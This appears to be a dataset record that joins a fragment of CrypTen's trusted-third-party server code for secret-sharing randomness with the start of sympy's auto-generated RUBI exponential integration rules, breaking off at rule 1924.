@staticmethod
def uninit():
"""Uninitializes a Trusted Third Party client"""
del TTPClient.__instance
TTPClient.__instance = None
@staticmethod
def get():
"""Returns the instance of the TTPClient"""
if TTPClient.__instance is None:
raise RuntimeError("TTPClient is not initialized")
return TTPClient.__instance
class TTPServer:
TERMINATE = -1
def __init__(self):
"""Initializes a Trusted Third Party server that receives requests"""
# Initialize connection
crypten.init()
self.ttp_group = comm.get().ttp_group
self.comm_group = comm.get().ttp_comm_group
self.device = "cpu"
self._setup_generators()
ttp_rank = comm.get().get_ttp_rank()
logging.info("TTPServer Initialized")
try:
while True:
# Wait for next request from client
message = comm.get().recv_obj(0, self.ttp_group)
logging.info("Message received: %s" % message)
if message == "terminate":
logging.info("TTPServer shutting down.")
return
function = message["function"]
device = message["device"]
args = message["args"]
kwargs = message["kwargs"]
self.device = device
result = getattr(self, function)(*args, **kwargs)
comm.get().send_obj(result.size(), 0, self.ttp_group)
comm.get().broadcast(result, ttp_rank, self.comm_group)
except RuntimeError as err:
logging.info("Encountered Runtime error. TTPServer shutting down:")
logging.info(f"{err}")
def _setup_generators(self):
"""Create random generator to send to a party"""
ws = comm.get().get_world_size()
seeds = [torch.randint(-(2 ** 63), 2 ** 63 - 1, size=()) for _ in range(ws)]
reqs = [
dist.isend(tensor=seeds[i], dst=i, group=self.ttp_group) for i in range(ws)
]
self.generators = [torch.Generator(device="cpu") for _ in range(ws)]
self.generators_cuda = [torch.Generator(device="cuda") for _ in range(ws)]
for i in range(ws):
self.generators[i].manual_seed(seeds[i].item())
self.generators_cuda[i].manual_seed(seeds[i].item())
reqs[i].wait()
dist.barrier(group=self.ttp_group)
def _get_generators(self, device=None):
if device is None:
device = "cpu"
device = torch.device(device)
if device.type == "cuda":
return self.generators_cuda
else:
return self.generators
def _get_additive_PRSS(self, size, remove_rank=False):
"""
Generates a plaintext value from a set of random additive secret shares
generated by each party
"""
gens = self._get_generators(device=self.device)
if remove_rank:
gens = gens[1:]
result = torch_stack(
[
generate_random_ring_element(size, generator=g, device=g.device)
for g in gens
]
)
return result.sum(0)
def _get_binary_PRSS(self, size, bitlength=None, remove_rank=None):
"""
Generates a plaintext value from a set of random binary secret shares
generated by each party
"""
gens = self._get_generators(device=self.device)
if remove_rank:
gens = gens[1:]
result = [
generate_kbit_random_tensor(
size, bitlength=bitlength, generator=g, device=g.device
)
for g in gens
]
return reduce(lambda a, b: a ^ b, result)
def additive(self, size0, size1, op, *args, **kwargs):
# Add all shares of `a` and `b` to get plaintext `a` and `b`
a = self._get_additive_PRSS(size0)
b = self._get_additive_PRSS(size1)
c = getattr(torch, op)(a, b, *args, **kwargs)
# Subtract all other shares of `c` from plaintext value of `c` to get `c0`
c0 = c - self._get_additive_PRSS(c.size(), remove_rank=True)
return c0
def square(self, size):
# Add all shares of `r` to get plaintext `r`
r = self._get_additive_PRSS(size)
r2 = r.mul(r)
return r2 - self._get_additive_PRSS(size, remove_rank=True)
def binary(self, size0, size1):
# xor all shares of `a` and `b` to get plaintext `a` and `b`
a = self._get_binary_PRSS(size0)
b = self._get_binary_PRSS(size1)
c = a & b
# xor all other shares of `c` from plaintext value of `c` to get `c0`
c0 = c ^ self._get_binary_PRSS(c.size(), remove_rank=True)
return c0
def wraps(self, size):
r = [generate_random_ring_element(size, generator=g) for g in self.generators]
theta_r = count_wraps(r)
return theta_r - self._get_additive_PRSS(size, remove_rank=True)
def B2A(self, size):
rB = self._get_binary_PRSS(size, bitlength=1)
# Subtract all other shares of `rA` from plaintext value of `rA`
rA = rB - self._get_additive_PRSS(size, remove_rank=True)
return rA
| [
"[email protected]"
]
| |
6761e8fe9dbbdf0919c1045ac3ee86a999c1cea5 | bc6492a9a30ac7228caad91643d58653b49ab9e3 | /sympy/integrals/rubi/rules/exponential.py | 90b28d15cf3a1c0f5509ed7a20ff2220e061a60f | []
| no_license | cosmosZhou/sagemath | 2c54ea04868882340c7ef981b7f499fb205095c9 | 0608b946174e86182c6d35d126cd89d819d1d0b8 | refs/heads/master | 2023-01-06T07:31:37.546716 | 2020-11-12T06:39:22 | 2020-11-12T06:39:22 | 311,177,322 | 1 | 0 | null | 2020-11-12T06:09:11 | 2020-11-08T23:42:40 | Python | UTF-8 | Python | false | false | 67,083 | py | '''
This code is automatically generated. Never edit it manually.
For details of generating the code see `rubi_parsing_guide.md` in `parsetools`.
'''
from sympy.external import import_module
matchpy = import_module("matchpy")
from sympy.utilities.decorator import doctest_depends_on
if matchpy:
from matchpy import Pattern, ReplacementRule, CustomConstraint, is_match
from sympy.integrals.rubi.utility_function import (
Int, Sum, Set, With, Module, Scan, MapAnd, FalseQ,
ZeroQ, NegativeQ, NonzeroQ, FreeQ, NFreeQ, List, Log, PositiveQ,
PositiveIntegerQ, NegativeIntegerQ, IntegerQ, IntegersQ,
ComplexNumberQ, PureComplexNumberQ, RealNumericQ, PositiveOrZeroQ,
NegativeOrZeroQ, FractionOrNegativeQ, NegQ, Equal, Unequal, IntPart,
FracPart, RationalQ, ProductQ, SumQ, NonsumQ, Subst, First, Rest,
SqrtNumberQ, SqrtNumberSumQ, LinearQ, Sqrt, ArcCosh, Coefficient,
Denominator, Hypergeometric2F1, Not, Simplify, FractionalPart,
IntegerPart, AppellF1, EllipticPi, EllipticE, EllipticF, ArcTan,
ArcCot, ArcCoth, ArcTanh, ArcSin, ArcSinh, ArcCos, ArcCsc, ArcSec,
ArcCsch, ArcSech, Sinh, Tanh, Cosh, Sech, Csch, Coth, LessEqual, Less,
Greater, GreaterEqual, FractionQ, IntLinearcQ, Expand, IndependentQ,
PowerQ, IntegerPowerQ, PositiveIntegerPowerQ, FractionalPowerQ, AtomQ,
ExpQ, LogQ, Head, MemberQ, TrigQ, SinQ, CosQ, TanQ, CotQ, SecQ, CscQ,
Sin, Cos, Tan, Cot, Sec, Csc, HyperbolicQ, SinhQ, CoshQ, TanhQ, CothQ,
SechQ, CschQ, InverseTrigQ, SinCosQ, SinhCoshQ, LeafCount, Numerator,
NumberQ, NumericQ, Length, ListQ, Im, Re, InverseHyperbolicQ,
InverseFunctionQ, TrigHyperbolicFreeQ, InverseFunctionFreeQ, RealQ,
EqQ, FractionalPowerFreeQ, ComplexFreeQ, PolynomialQ, FactorSquareFree,
PowerOfLinearQ, Exponent, QuadraticQ, LinearPairQ, BinomialParts,
TrinomialParts, PolyQ, EvenQ, OddQ, PerfectSquareQ, NiceSqrtAuxQ,
NiceSqrtQ, Together, PosAux, PosQ, CoefficientList, ReplaceAll,
ExpandLinearProduct, GCD, ContentFactor, NumericFactor,
NonnumericFactors, MakeAssocList, GensymSubst, KernelSubst,
ExpandExpression, Apart, SmartApart, MatchQ,
PolynomialQuotientRemainder, FreeFactors, NonfreeFactors,
RemoveContentAux, RemoveContent, FreeTerms, NonfreeTerms,
ExpandAlgebraicFunction, CollectReciprocals, ExpandCleanup,
AlgebraicFunctionQ, Coeff, LeadTerm, RemainingTerms, LeadFactor,
RemainingFactors, LeadBase, LeadDegree, Numer, Denom, hypergeom, Expon,
MergeMonomials, PolynomialDivide, BinomialQ, TrinomialQ,
GeneralizedBinomialQ, GeneralizedTrinomialQ, FactorSquareFreeList,
PerfectPowerTest, SquareFreeFactorTest, RationalFunctionQ,
RationalFunctionFactors, NonrationalFunctionFactors, Reverse,
RationalFunctionExponents, RationalFunctionExpand, ExpandIntegrand,
SimplerQ, SimplerSqrtQ, SumSimplerQ, BinomialDegree, TrinomialDegree,
CancelCommonFactors, SimplerIntegrandQ, GeneralizedBinomialDegree,
GeneralizedBinomialParts, GeneralizedTrinomialDegree,
GeneralizedTrinomialParts, MonomialQ, MonomialSumQ,
MinimumMonomialExponent, MonomialExponent, LinearMatchQ,
PowerOfLinearMatchQ, QuadraticMatchQ, CubicMatchQ, BinomialMatchQ,
TrinomialMatchQ, GeneralizedBinomialMatchQ, GeneralizedTrinomialMatchQ,
QuotientOfLinearsMatchQ, PolynomialTermQ, PolynomialTerms,
NonpolynomialTerms, PseudoBinomialParts, NormalizePseudoBinomial,
PseudoBinomialPairQ, PseudoBinomialQ, PolynomialGCD, PolyGCD,
AlgebraicFunctionFactors, NonalgebraicFunctionFactors,
QuotientOfLinearsP, QuotientOfLinearsParts, QuotientOfLinearsQ,
Flatten, Sort, AbsurdNumberQ, AbsurdNumberFactors,
NonabsurdNumberFactors, SumSimplerAuxQ, Prepend, Drop,
CombineExponents, FactorInteger, FactorAbsurdNumber,
SubstForInverseFunction, SubstForFractionalPower,
SubstForFractionalPowerOfQuotientOfLinears,
FractionalPowerOfQuotientOfLinears, SubstForFractionalPowerQ,
SubstForFractionalPowerAuxQ, FractionalPowerOfSquareQ,
FractionalPowerSubexpressionQ, Apply, FactorNumericGcd,
MergeableFactorQ, MergeFactor, MergeFactors, TrigSimplifyQ,
TrigSimplify, TrigSimplifyRecur, Order, FactorOrder, Smallest,
OrderedQ, MinimumDegree, PositiveFactors, Sign, NonpositiveFactors,
PolynomialInAuxQ, PolynomialInQ, ExponentInAux, ExponentIn,
PolynomialInSubstAux, PolynomialInSubst, Distrib, DistributeDegree,
FunctionOfPower, DivideDegreesOfFactors, MonomialFactor, FullSimplify,
FunctionOfLinearSubst, FunctionOfLinear, NormalizeIntegrand,
NormalizeIntegrandAux, NormalizeIntegrandFactor,
NormalizeIntegrandFactorBase, NormalizeTogether,
NormalizeLeadTermSigns, AbsorbMinusSign, NormalizeSumFactors,
SignOfFactor, NormalizePowerOfLinear, SimplifyIntegrand, SimplifyTerm,
TogetherSimplify, SmartSimplify, SubstForExpn, ExpandToSum, UnifySum,
UnifyTerms, UnifyTerm, CalculusQ, FunctionOfInverseLinear,
PureFunctionOfSinhQ, PureFunctionOfTanhQ, PureFunctionOfCoshQ,
IntegerQuotientQ, OddQuotientQ, EvenQuotientQ, FindTrigFactor,
FunctionOfSinhQ, FunctionOfCoshQ, OddHyperbolicPowerQ, FunctionOfTanhQ,
FunctionOfTanhWeight, FunctionOfHyperbolicQ, SmartNumerator,
SmartDenominator, SubstForAux, ActivateTrig, ExpandTrig, TrigExpand,
SubstForTrig, SubstForHyperbolic, InertTrigFreeQ, LCM,
SubstForFractionalPowerOfLinear, FractionalPowerOfLinear,
InverseFunctionOfLinear, InertTrigQ, InertReciprocalQ, DeactivateTrig,
FixInertTrigFunction, DeactivateTrigAux, PowerOfInertTrigSumQ,
PiecewiseLinearQ, KnownTrigIntegrandQ, KnownSineIntegrandQ,
KnownTangentIntegrandQ, KnownCotangentIntegrandQ,
KnownSecantIntegrandQ, TryPureTanSubst, TryTanhSubst, TryPureTanhSubst,
AbsurdNumberGCD, AbsurdNumberGCDList, ExpandTrigExpand,
ExpandTrigReduce, ExpandTrigReduceAux, NormalizeTrig, TrigToExp,
ExpandTrigToExp, TrigReduce, FunctionOfTrig, AlgebraicTrigFunctionQ,
FunctionOfHyperbolic, FunctionOfQ, FunctionOfExpnQ, PureFunctionOfSinQ,
PureFunctionOfCosQ, PureFunctionOfTanQ, PureFunctionOfCotQ,
FunctionOfCosQ, FunctionOfSinQ, OddTrigPowerQ, FunctionOfTanQ,
FunctionOfTanWeight, FunctionOfTrigQ, FunctionOfDensePolynomialsQ,
FunctionOfLog, PowerVariableExpn, PowerVariableDegree,
PowerVariableSubst, EulerIntegrandQ, FunctionOfSquareRootOfQuadratic,
SquareRootOfQuadraticSubst, Divides, EasyDQ, ProductOfLinearPowersQ,
Rt, NthRoot, AtomBaseQ, SumBaseQ, NegSumBaseQ, AllNegTermQ,
SomeNegTermQ, TrigSquareQ, RtAux, TrigSquare, IntSum, IntTerm, Map2,
ConstantFactor, SameQ, ReplacePart, CommonFactors,
MostMainFactorPosition, FunctionOfExponentialQ, FunctionOfExponential,
FunctionOfExponentialFunction, FunctionOfExponentialFunctionAux,
FunctionOfExponentialTest, FunctionOfExponentialTestAux, stdev,
rubi_test, If, IntQuadraticQ, IntBinomialQ, RectifyTangent,
RectifyCotangent, Inequality, Condition, Simp, SimpHelp, SplitProduct,
SplitSum, SubstFor, SubstForAux, FresnelS, FresnelC, Erfc, Erfi, Gamma,
FunctionOfTrigOfLinearQ, ElementaryFunctionQ, Complex, UnsameQ,
_SimpFixFactor, SimpFixFactor, _FixSimplify, FixSimplify,
_SimplifyAntiderivativeSum, SimplifyAntiderivativeSum,
_SimplifyAntiderivative, SimplifyAntiderivative, _TrigSimplifyAux,
TrigSimplifyAux, Cancel, Part, PolyLog, D, Dist, Sum_doit, PolynomialQuotient, Floor,
PolynomialRemainder, Factor, PolyLog, CosIntegral, SinIntegral, LogIntegral, SinhIntegral,
CoshIntegral, Rule, Erf, PolyGamma, ExpIntegralEi, ExpIntegralE, LogGamma , UtilityOperator, Factorial,
Zeta, ProductLog, DerivativeDivides, HypergeometricPFQ, IntHide, OneQ, Null, rubi_exp as exp, rubi_log as log, Discriminant,
Negative, Quotient
)
from sympy import (Integral, S, sqrt, And, Or, Integer, Float, Mod, I, Abs, simplify, Mul,
Add, Pow, sign, EulerGamma)
from sympy.integrals.rubi.symbol import WC
from sympy.core.symbol import symbols, Symbol
from sympy.functions import (sin, cos, tan, cot, csc, sec, sqrt, erf)
from sympy.functions.elementary.hyperbolic import (acosh, asinh, atanh, acoth, acsch, asech, cosh, sinh, tanh, coth, sech, csch)
from sympy.functions.elementary.trigonometric import (atan, acsc, asin, acot, acos, asec, atan2)
from sympy import pi as Pi
A_, B_, C_, F_, G_, H_, a_, b_, c_, d_, e_, f_, g_, h_, i_, j_, k_, l_, m_, n_, p_, q_, r_, t_, u_, v_, s_, w_, x_, y_, z_ = [WC(i) for i in 'ABCFGHabcdefghijklmnpqrtuvswxyz']
a1_, a2_, b1_, b2_, c1_, c2_, d1_, d2_, n1_, n2_, e1_, e2_, f1_, f2_, g1_, g2_, n1_, n2_, n3_, Pq_, Pm_, Px_, Qm_, Qr_, Qx_, jn_, mn_, non2_, RFx_, RGx_ = [WC(i) for i in ['a1', 'a2', 'b1', 'b2', 'c1', 'c2', 'd1', 'd2', 'n1', 'n2', 'e1', 'e2', 'f1', 'f2', 'g1', 'g2', 'n1', 'n2', 'n3', 'Pq', 'Pm', 'Px', 'Qm', 'Qr', 'Qx', 'jn', 'mn', 'non2', 'RFx', 'RGx']]
i, ii , Pqq, Q, R, r, C, k, u = symbols('i ii Pqq Q R r C k u')
_UseGamma = False
ShowSteps = False
StepCounter = None
def exponential(rubi):
from sympy.integrals.rubi.constraints import cons31, cons168, cons515, cons1098, cons1099, cons3, cons7, cons27, cons48, cons125, cons208, cons4, cons94, cons17, cons18, cons21, cons1100, cons128, cons2, cons244, cons137, cons552, cons1101, cons1102, cons5, cons380, cons54, cons1103, cons1104, cons1105, cons209, cons224, cons796, cons797, cons50, cons1106, cons804, cons1107, cons812, cons1108, cons1109, cons1110, cons1111, cons584, cons1112, cons1113, cons479, cons480, cons1114, cons196, cons23, cons1115, cons53, cons1116, cons1117, cons1118, cons1119, cons85, cons1120, cons356, cons531, cons1121, cons1122, cons535, cons93, cons1123, cons1124, cons176, cons367, cons166, cons744, cons68, cons840, cons1125, cons1126, cons1127, cons25, cons71, cons1128, cons1129, cons1130, cons818, cons1131, cons1132, cons1133, cons1134, cons819, cons1135, cons1136, cons1137, cons1138, cons148, cons810, cons811, cons1139, cons1140, cons52, cons800, cons1141, cons1142, cons1143, cons813, cons1144, cons226, cons62, cons1145, cons1146, cons1147, cons1148, cons1149, cons1150, cons1151, cons463, cons1152, cons43, cons448, cons1153, cons1154, cons1155, cons1017
pattern1901 = Pattern(Integral((F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1)))*WC('b', S(1)))**WC('n', S(1))*(x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1)), x_), cons1099, cons3, cons7, cons27, cons48, cons125, cons208, cons4, cons31, cons168, cons515, cons1098)
def replacement1901(m, f, g, b, d, c, n, x, F, e):
rubi.append(1901)
return -Dist(d*m/(f*g*n*log(F)), Int((F**(g*(e + f*x))*b)**n*(c + d*x)**(m + S(-1)), x), x) + Simp((F**(g*(e + f*x))*b)**n*(c + d*x)**m/(f*g*n*log(F)), x)
rule1901 = ReplacementRule(pattern1901, replacement1901)
pattern1902 = Pattern(Integral((F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1)))*WC('b', S(1)))**WC('n', S(1))*(x_*WC('d', S(1)) + WC('c', S(0)))**m_, x_), cons1099, cons3, cons7, cons27, cons48, cons125, cons208, cons4, cons31, cons94, cons515, cons1098)
def replacement1902(m, f, g, b, d, c, n, x, F, e):
rubi.append(1902)
return -Dist(f*g*n*log(F)/(d*(m + S(1))), Int((F**(g*(e + f*x))*b)**n*(c + d*x)**(m + S(1)), x), x) + Simp((F**(g*(e + f*x))*b)**n*(c + d*x)**(m + S(1))/(d*(m + S(1))), x)
rule1902 = ReplacementRule(pattern1902, replacement1902)
pattern1903 = Pattern(Integral(F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1)))/(x_*WC('d', S(1)) + WC('c', S(0))), x_), cons1099, cons7, cons27, cons48, cons125, cons208, cons1098)
def replacement1903(f, g, d, c, x, F, e):
rubi.append(1903)
return Simp(F**(g*(-c*f/d + e))*ExpIntegralEi(f*g*(c + d*x)*log(F)/d)/d, x)
rule1903 = ReplacementRule(pattern1903, replacement1903)
pattern1904 = Pattern(Integral(F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1)))*(x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1)), x_), cons1099, cons7, cons27, cons48, cons125, cons208, cons17)
def replacement1904(m, f, g, d, c, x, F, e):
rubi.append(1904)
return Simp(F**(g*(-c*f/d + e))*f**(-m + S(-1))*g**(-m + S(-1))*(-d)**m*Gamma(m + S(1), -f*g*(c + d*x)*log(F)/d)*log(F)**(-m + S(-1)), x)
rule1904 = ReplacementRule(pattern1904, replacement1904)
pattern1905 = Pattern(Integral(F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1)))/sqrt(x_*WC('d', S(1)) + WC('c', S(0))), x_), cons1099, cons7, cons27, cons48, cons125, cons208, cons1098)
def replacement1905(f, g, d, c, x, F, e):
rubi.append(1905)
return Dist(S(2)/d, Subst(Int(F**(g*(-c*f/d + e) + f*g*x**S(2)/d), x), x, sqrt(c + d*x)), x)
rule1905 = ReplacementRule(pattern1905, replacement1905)
pattern1906 = Pattern(Integral(F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1)))*(x_*WC('d', S(1)) + WC('c', S(0)))**m_, x_), cons1099, cons7, cons27, cons48, cons125, cons208, cons21, cons18)
def replacement1906(m, f, g, d, c, x, F, e):
rubi.append(1906)
return -Simp(F**(g*(-c*f/d + e))*(-f*g*log(F)/d)**(-IntPart(m) + S(-1))*(-f*g*(c + d*x)*log(F)/d)**(-FracPart(m))*(c + d*x)**FracPart(m)*Gamma(m + S(1), -f*g*(c + d*x)*log(F)/d)/d, x)
rule1906 = ReplacementRule(pattern1906, replacement1906)
pattern1907 = Pattern(Integral((F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1)))*WC('b', S(1)))**n_*(x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1)), x_), cons1099, cons3, cons7, cons27, cons48, cons125, cons208, cons21, cons4, cons1100)
def replacement1907(m, f, g, b, d, c, n, x, F, e):
rubi.append(1907)
return Dist(F**(-g*n*(e + f*x))*(F**(g*(e + f*x))*b)**n, Int(F**(g*n*(e + f*x))*(c + d*x)**m, x), x)
rule1907 = ReplacementRule(pattern1907, replacement1907)
pattern1908 = Pattern(Integral((a_ + (F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1))))**WC('n', S(1))*WC('b', S(1)))**WC('p', S(1))*(x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons21, cons4, cons128)
def replacement1908(p, m, f, g, b, d, c, n, a, x, F, e):
rubi.append(1908)
return Int(ExpandIntegrand((c + d*x)**m, (a + b*(F**(g*(e + f*x)))**n)**p, x), x)
rule1908 = ReplacementRule(pattern1908, replacement1908)
pattern1909 = Pattern(Integral((x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1))/(a_ + (F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1))))**WC('n', S(1))*WC('b', S(1))), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons4, cons31, cons168)
def replacement1909(m, f, g, b, d, c, n, a, x, F, e):
rubi.append(1909)
return Dist(d*m/(a*f*g*n*log(F)), Int((c + d*x)**(m + S(-1))*log(a*(F**(g*(e + f*x)))**(-n)/b + S(1)), x), x) - Simp((c + d*x)**m*log(a*(F**(g*(e + f*x)))**(-n)/b + S(1))/(a*f*g*n*log(F)), x)
rule1909 = ReplacementRule(pattern1909, replacement1909)
def With1910(p, m, f, g, b, d, c, n, a, x, F, e):
u = IntHide((a + b*(F**(g*(e + f*x)))**n)**p, x)
rubi.append(1910)
return -Dist(d*m, Int(u*(c + d*x)**(m + S(-1)), x), x) + Dist((c + d*x)**m, u, x)
pattern1910 = Pattern(Integral((a_ + (F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1))))**WC('n', S(1))*WC('b', S(1)))**p_*(x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons4, cons244, cons168, cons137)
rule1910 = ReplacementRule(pattern1910, With1910)
pattern1911 = Pattern(Integral(u_**WC('m', S(1))*((F_**(v_*WC('g', S(1))))**WC('n', S(1))*WC('b', S(1)) + WC('a', S(0)))**WC('p', S(1)), x_), cons1099, cons2, cons3, cons208, cons4, cons5, cons552, cons1101, cons1102, cons17)
def replacement1911(v, p, u, m, g, b, a, n, x, F):
rubi.append(1911)
return Int((a + b*(F**(g*ExpandToSum(v, x)))**n)**p*NormalizePowerOfLinear(u, x)**m, x)
rule1911 = ReplacementRule(pattern1911, replacement1911)
def With1912(v, p, u, m, g, b, a, n, x, F):
uu = NormalizePowerOfLinear(u, x)
z = Symbol('z')
z = If(And(PowerQ(uu), FreeQ(Part(uu, S(2)), x)), Part(uu, S(1))**(m*Part(uu, S(2))), uu**m)
z = If(And(PowerQ(uu), FreeQ(Part(uu, 2), x)), Part(uu, 1)**(m*Part(uu, 2)), uu**m)
return Simp(uu**m*Int(z*(a + b*(F**(g*ExpandToSum(v, x)))**n)**p, x)/z, x)
pattern1912 = Pattern(Integral(u_**WC('m', S(1))*((F_**(v_*WC('g', S(1))))**WC('n', S(1))*WC('b', S(1)) + WC('a', S(0)))**WC('p', S(1)), x_), cons1099, cons2, cons3, cons208, cons21, cons4, cons5, cons552, cons1101, cons1102, cons18)
rule1912 = ReplacementRule(pattern1912, With1912)
pattern1913 = Pattern(Integral((a_ + (F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1))))**WC('n', S(1))*WC('b', S(1)))**WC('p', S(1))*(x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1)), x_), cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons21, cons4, cons5, cons380)
def replacement1913(p, m, f, g, b, d, c, n, a, x, F, e):
rubi.append(1913)
return Int((a + b*(F**(g*(e + f*x)))**n)**p*(c + d*x)**m, x)
rule1913 = ReplacementRule(pattern1913, replacement1913)
pattern1914 = Pattern(Integral((x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1))*(F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1))))**WC('n', S(1))/(a_ + (F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1))))**WC('n', S(1))*WC('b', S(1))), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons4, cons31, cons168)
def replacement1914(m, f, g, b, d, c, n, a, x, F, e):
rubi.append(1914)
return -Dist(d*m/(b*f*g*n*log(F)), Int((c + d*x)**(m + S(-1))*log(S(1) + b*(F**(g*(e + f*x)))**n/a), x), x) + Simp((c + d*x)**m*log(S(1) + b*(F**(g*(e + f*x)))**n/a)/(b*f*g*n*log(F)), x)
rule1914 = ReplacementRule(pattern1914, replacement1914)
pattern1915 = Pattern(Integral((x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1))*((F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1))))**WC('n', S(1))*WC('b', S(1)) + WC('a', S(0)))**WC('p', S(1))*(F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1))))**WC('n', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons21, cons4, cons5, cons54)
def replacement1915(p, m, f, g, b, d, a, n, c, x, F, e):
rubi.append(1915)
return -Dist(d*m/(b*f*g*n*(p + S(1))*log(F)), Int((a + b*(F**(g*(e + f*x)))**n)**(p + S(1))*(c + d*x)**(m + S(-1)), x), x) + Simp((a + b*(F**(g*(e + f*x)))**n)**(p + S(1))*(c + d*x)**m/(b*f*g*n*(p + S(1))*log(F)), x)
rule1915 = ReplacementRule(pattern1915, replacement1915)
pattern1916 = Pattern(Integral((x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1))*((F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1))))**WC('n', S(1))*WC('b', S(1)) + WC('a', S(0)))**WC('p', S(1))*(F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1))))**WC('n', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons21, cons4, cons5, cons1103)
def replacement1916(p, m, f, g, b, d, a, n, c, x, F, e):
rubi.append(1916)
return Int((a + b*(F**(g*(e + f*x)))**n)**p*(c + d*x)**m*(F**(g*(e + f*x)))**n, x)
rule1916 = ReplacementRule(pattern1916, replacement1916)
pattern1917 = Pattern(Integral((G_**((x_*WC('i', S(1)) + WC('h', S(0)))*WC('j', S(1)))*WC('k', S(1)))**WC('q', S(1))*(x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1))*((F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1))))**WC('n', S(1))*WC('b', S(1)) + WC('a', S(0)))**WC('p', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons224, cons796, cons797, cons21, cons4, cons5, cons50, cons1104, cons1105)
def replacement1917(p, j, k, m, f, g, b, i, d, G, a, n, c, x, h, q, e, F):
rubi.append(1917)
return Dist((G**(j*(h + i*x))*k)**q*(F**(g*(e + f*x)))**(-n), Int((a + b*(F**(g*(e + f*x)))**n)**p*(c + d*x)**m*(F**(g*(e + f*x)))**n, x), x)
rule1917 = ReplacementRule(pattern1917, replacement1917)
pattern1918 = Pattern(Integral((F_**((x_*WC('b', S(1)) + WC('a', S(0)))*WC('c', S(1))))**WC('n', S(1)), x_), cons1099, cons2, cons3, cons7, cons4, cons1106)
def replacement1918(b, c, n, a, x, F):
rubi.append(1918)
return Simp((F**(c*(a + b*x)))**n/(b*c*n*log(F)), x)
rule1918 = ReplacementRule(pattern1918, replacement1918)
pattern1919 = Pattern(Integral(F_**(v_*WC('c', S(1)))*u_, x_), cons1099, cons7, cons804, cons552, cons1107)
def replacement1919(v, u, c, x, F):
rubi.append(1919)
return Int(ExpandIntegrand(F**(c*ExpandToSum(v, x))*u, x), x)
rule1919 = ReplacementRule(pattern1919, replacement1919)
pattern1920 = Pattern(Integral(F_**(v_*WC('c', S(1)))*u_, x_), cons1099, cons7, cons804, cons552, cons1098)
def replacement1920(v, u, c, x, F):
rubi.append(1920)
return Int(ExpandIntegrand(F**(c*ExpandToSum(v, x)), u, x), x)
rule1920 = ReplacementRule(pattern1920, replacement1920)
pattern1921 = Pattern(Integral(F_**(v_*WC('c', S(1)))*u_**WC('m', S(1))*w_, x_), cons1099, cons7, cons21, cons812, cons1108)
def replacement1921(v, w, u, m, c, x, F):
rubi.append(1921)
return Simp(F**(c*v)*u**(m + S(1))*Coefficient(w, x, S(1))/(c*Coefficient(u, x, S(1))*Coefficient(v, x, S(1))*log(F)), x)
rule1921 = ReplacementRule(pattern1921, replacement1921)
pattern1922 = Pattern(Integral(F_**(v_*WC('c', S(1)))*u_**WC('m', S(1))*w_, x_), cons1099, cons7, cons1109, cons552, cons1101, cons17, cons1107)
def replacement1922(v, w, u, m, c, x, F):
rubi.append(1922)
return Int(ExpandIntegrand(F**(c*ExpandToSum(v, x))*w*NormalizePowerOfLinear(u, x)**m, x), x)
rule1922 = ReplacementRule(pattern1922, replacement1922)
pattern1923 = Pattern(Integral(F_**(v_*WC('c', S(1)))*u_**WC('m', S(1))*w_, x_), cons1099, cons7, cons1109, cons552, cons1101, cons17, cons1098)
def replacement1923(v, w, u, m, c, x, F):
rubi.append(1923)
return Int(ExpandIntegrand(F**(c*ExpandToSum(v, x)), w*NormalizePowerOfLinear(u, x)**m, x), x)
rule1923 = ReplacementRule(pattern1923, replacement1923)
def With1924(v, w, u, m, c, x, F):
uu = NormalizePowerOfLinear(u, x)
z = Symbol('z')
z = If(And(PowerQ(uu), FreeQ(Part(uu, S(2)), x)), Part(uu, S(1))**(m*Part(uu, S(2))), uu**m)
z = If(And(PowerQ(uu), FreeQ(Part(uu, 2), x)), Part(uu, 1)**(m*Part(uu, 2)), uu**m)
return Simp(uu**m*Int(ExpandIntegrand(F**(c*ExpandToSum(v, x))*w*z, x), x)/z, x)
pattern1924 = Pattern(Integral(F_**(v_*WC('c', S(1)))*u_**WC('m', S(1))*w_, x_), cons1099, cons7, cons21, cons1109, cons552, cons1101, cons18)
rule1924 = ReplacementRule(pattern1924, With1924)
